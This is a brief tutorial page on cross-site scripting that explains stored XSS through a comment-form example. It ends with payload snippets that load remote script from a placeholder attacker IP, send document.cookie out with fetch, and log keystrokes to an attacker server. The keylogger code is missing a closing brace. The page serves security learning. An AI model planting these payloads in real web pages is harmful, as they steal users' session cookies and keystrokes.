JavaScript injection (XSS)

What is it?

Commonly known as cross-site scripting (XSS), JavaScript injection is where an attacker can inject arbitrary JavaScript to be executed.

A simple example

  • A vulnerable webapp allows users to post comments.

  • When a user submits a comment, the website stores it and then displays it on the homepage without any validation or sanitization.

  • An attacker could exploit this by posting <script>prompt(1)</script> to the site.

  • When a user visits the homepage, the payload is executed in that users browser.

Other learning resources:


  • Bullets



<script src="http://<our-ip>/script.js"></script>
let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("https://<your-web-server>/e?c=" + encodedCookie)
function logKey(event){
    fetch("http://<your-web-server>/e?c=" + event.key)
document.addEventListener('keydown', logKey);

Last updated